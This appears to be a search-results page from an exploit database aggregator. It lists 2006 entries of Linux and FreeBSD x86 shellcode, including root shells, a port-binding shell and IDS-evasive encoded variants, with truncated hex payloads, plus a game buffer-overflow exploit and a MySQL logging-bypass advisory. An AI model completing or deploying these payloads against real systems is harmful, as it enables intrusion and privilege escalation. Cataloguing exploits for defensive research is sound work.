Lucene search
+L

3674 matches found

zdt
zdt
added 2006/04/17 12:0 a.m.18 views

linux/x86 execve(/bin/sh) + ZIP Header 28 bytes

Exploit for linux/x86 platform in category shellcode =============================================== linux/x86 execve/bin/sh + ZIP Header 28 bytes =============================================== / linux/x86 - execve"/bin/sh", "/bin/sh", NULL + ZIP Header - 28 bytes email protected: file...

7AI score
SaveExploits0
seebug.org
seebug.org
added 2006/04/14 12:0 a.m.14 views

freebsd/x86 execve /bin/sh 23 bytes

No description provided by source. / FreeBSDx86-execvesh-23b-iZ.c Shellcode, execve /bin/sh, 23 bytes by IZ guerrilla.sytes.net / char setreuidcode = "\x31\xc0" / xor %eax,%eax / "\x50" / push %eax / "\x68\x2f\x2f\x73\x68" / push $0x68732f2f //sh / "\x68\x2f\x62\x69\x6e" / push $0x6e69622f /bin/...

7.1AI score
SaveExploits0
zdt
zdt
added 2006/04/06 12:0 a.m.24 views

linux/x86 Password Authentication portbind Shellcode 166 bytes

Exploit for linux/x86 platform in category shellcode ============================================================== linux/x86 Password Authentication portbind Shellcode 166 bytes ============================================================== / linux-x86-authportbind.c - AUTH portbind shellcode 16...

7AI score
SaveExploits0
Exploit DB
Exploit DB
added 2006/04/06 12:0 a.m.30 views

linux/x86 Password Authentication portbind Shellcode 166 bytes

linux/x86 Password Authentication portbind Shellcode 166 bytes. Shellcode exploit for linx86 platform / linux-x86-authportbind.c - AUTH portbind shellcode 166 bytes for Linux/x86 Copyright c 2006 Gotfault Security portbind shellcode that bind's a shell on port 64713/tcp and requests a user...

0.7AI score
SaveExploits0
seebug.org
seebug.org
added 2006/04/03 12:0 a.m.24 views

linux/x86 execve(""/bin/sh"" [""/bin/sh"" NULL]) 23 bytes

No description provided by source. / linux-x86-binshv2.c - 23 bytes Copyright c 2006 Gotfault Security [email protected] Linux/x86 execve"/bin/sh", "/bin/sh", NULL / char shellcode = "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x68\x2f\x2f\x73\x68" // push...

7.1AI score
SaveExploits0
zdt
zdt
added 2006/04/03 12:0 a.m.23 views

linux/x86 execve("/bin/sh", ["/bin/sh", NULL]) 25 bytes

Exploit for linux/x86 platform in category shellcode ======================================================= linux/x86 execve"/bin/sh", "/bin/sh", NULL 25 bytes ======================================================= / Linux/x86 execve"/bin/sh", "/bin/sh", NULL - 25 bytes - email protected / char...

7AI score
SaveExploits0
seebug.org
seebug.org
added 2006/04/03 12:0 a.m.14 views

linux/x86 setreuid(0 0) execve(""/bin/sh"" [""/bin/sh"" NULL]) 33 bytes

No description provided by source. / Linux/x86 setreuid0,0 + execve"/bin/sh", "/bin/sh", NULL - 33 bytes - [email protected] / char shellcode = "\x6a\x46" // push $0x46 "\x58" // pop %eax "\x31\xdb" // xor %ebx, %ebx "\x31\xc9" // xor %ecx, %ecx "\xcd\x80" // int $0x80 "\x31\xd2" // xor %edx, %edx...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2006/04/03 12:0 a.m.27 views

linux/x86 - setuid0 + execve"/bin/sh", "/bin/sh", NULL 31 bytes

linux/x86 setuid0 + execve"/bin/sh", "/bin/sh", NULL 31 bytes. Shellcode exploit for linx86 platform / Linux/x86 setuid0 + execve"/bin/sh", "/bin/sh", NULL - 31 bytes - [email protected] / char shellcode = "\x6a\x17" // push $0x17 "\x58" // pop %eax "\x31\xdb" // xor %ebx, %ebx "\xcd\x80" // int...

0.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2006/04/03 12:0 a.m.32 views

linux/x86 - execve"/bin/sh", "/bin/sh", NULL 25 bytes

linux/x86 execve"/bin/sh", "/bin/sh", NULL 25 bytes. Shellcode exploit for linx86 platform / Linux/x86 execve"/bin/sh", "/bin/sh", NULL - 25 bytes - [email protected] / char shellcode = "\x31\xc0" // xor %eax, %eax "\x50" // push %eax "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6...

7.4AI score
SaveExploits0
zdt
zdt
added 2006/04/03 12:0 a.m.20 views

linux/x86 setreuid(0,0) execve("/bin/sh", ["/bin/sh", NULL]) 33 bytes

Exploit for linux/x86 platform in category shellcode ===================================================================== linux/x86 setreuid0,0 execve"/bin/sh", "/bin/sh", NULL 33 bytes ===================================================================== / Linux/x86 setreuid0,0 + execve"/bin/sh...

7AI score
SaveExploits0
Exploit DB
Exploit DB
added 2006/04/03 12:0 a.m.32 views

linux/x86 - setuid0,setgid0 execve/bin/sh, /bin/sh, NULL 37 bytes

linux/x86 setuid0,setgid0 execve/bin/sh, /bin/sh, NULL 37 bytes. Shellcode exploit for linx86 platform / Linux/x86 setuid0 + setgid0 + execve"/bin/sh", "/bin/sh", NULL - 37 bytes - [email protected] / char shellcode = "\x6a\x17" // push $0x17 "\x58" // pop %eax "\x31\xdb" // xor %ebx, %ebx...

SaveExploits0
Exploit DB
Exploit DB
added 2006/04/03 12:0 a.m.27 views

linux/x86 - execve"/bin/sh", "/bin/sh", NULL 23 bytes

linux/x86 execve"/bin/sh", "/bin/sh", NULL 23 bytes. Shellcode exploit for linx86 platform / linux-x86-binshv2.c - 23 bytes Copyright c 2006 Gotfault Security Linux/x86 execve"/bin/sh", "/bin/sh", NULL / char shellcode = "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %ed...

7.4AI score
SaveExploits0
OpenVAS
OpenVAS
added 2006/03/26 12:0 a.m.63 views

UltraVNC w/ DSM plugin detection

UltraVNC seems to be running on the remote port. Upon connection, the remote service on this port always sends the same 12 pseudo-random bytes. It is probably UltraVNC with the DSM encryption plugin. This plugin tunnels the RFB protocol into a RC4 encrypted stream. SPDX-FileCopyrightText: 2006...

7AI score
SaveExploits0
seebug.org
seebug.org
added 2006/03/06 12:0 a.m.25 views

Cube <= 2005_08_29 Multiple BoF/Crash Vulnerabilities Exploit

No description provided by source. / by Luigi Auriemma You NEED Enet for compiling this tool then remember -lenet http://enet.bespin.org / http://enet.cubik.org / include stdio.h include stdlib.h include string.h include enet/enet.h define VER "0.1" define PORT 28765 define MAXTRANS 5000 define...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2006/02/27 12:0 a.m.34 views

MySQL 5.0.18 - Query Logging Bypass

source: https://www.securityfocus.com/bid/16850/info MySQL is prone to a query-logging-bypass vulnerability. This issue is due to a discrepancy between the handling of NULL bytes in the 'mysqlrealquery' function and in the query-logging functionality. This issue allows attackers to bypass the...

4.6CVSS7.1AI score0.01347EPSS
SaveExploits1
exploitpack
exploitpack
added 2006/02/27 12:0 a.m.16 views

MySQL 5.0.18 - Query Logging Bypass

MySQL 5.0.18 - Query Logging Bypass source: https://www.securityfocus.com/bid/16850/info MySQL is prone to a query-logging-bypass vulnerability. This issue is due to a discrepancy between the handling of NULL bytes in the 'mysqlrealquery' function and in the query-logging functionality. This issu...

7.4AI score
SaveExploits0
Exploit DB
Exploit DB
added 2006/01/26 12:0 a.m.25 views

linux/x86 -execve /bin/sh anti-ids 40 bytes

linux/x86 execve /bin/sh anti-ids 40 bytes. Shellcode exploit for linx86 platform / N Shell : shellcodez Arch:x86 Platform:linux Size:40 Description: The shellcode to execute /bin/sh; This shellcode is anti-ids It not containz encoding engine but it not contain standart signatures as: "\xcd\x80"...

7.4AI score
SaveExploits0
zdt
zdt
added 2006/01/26 12:0 a.m.22 views

linux/x86 execve /bin/sh anti-ids 40 bytes

Exploit for linux/x86 platform in category shellcode ========================================== linux/x86 execve /bin/sh anti-ids 40 bytes ========================================== / N Shell : shellcodez Arch:x86 Platform:linux Size:40 Description: The shellcode to execute /bin/sh; This shellcod...

7AI score
SaveExploits0
Exploit DB
Exploit DB
added 2006/01/25 12:0 a.m.37 views

linux/x86 - execve /bin/sh encoded by +1 39 bytes

linux/x86 execve /bin/sh encoded by +1 39 bytes. Shellcode exploit for linx86 platform / linux/x86 - execve"/bin/sh", "/bin/sh", NULL / encoded by +1 - 39 bytes - izik / char shellcode = "\x68\x8a\xe2\xce\x81" // push $0x81cee28a "\x68\xb1\x0c\x53\x54" // push $0x54530cb1 "\x68\x6a\x6f\x8a\xe4" /...

SaveExploits0
seebug.org
seebug.org
added 2006/01/25 12:0 a.m.21 views

linux/x86 execve /bin/sh (encoded by +1) 39 bytes

No description provided by source. / linux/x86 - execve"/bin/sh", "/bin/sh", NULL / encoded by +1 - 39 bytes - izik [email protected] / char shellcode = "\x68\x8a\xe2\xce\x81" // push $0x81cee28a "\x68\xb1\x0c\x53\x54" // push $0x54530cb1 "\x68\x6a\x6f\x8a\xe4" // push $0xe48a6f6a...

7.1AI score
SaveExploits0
Rows per page
Query Builder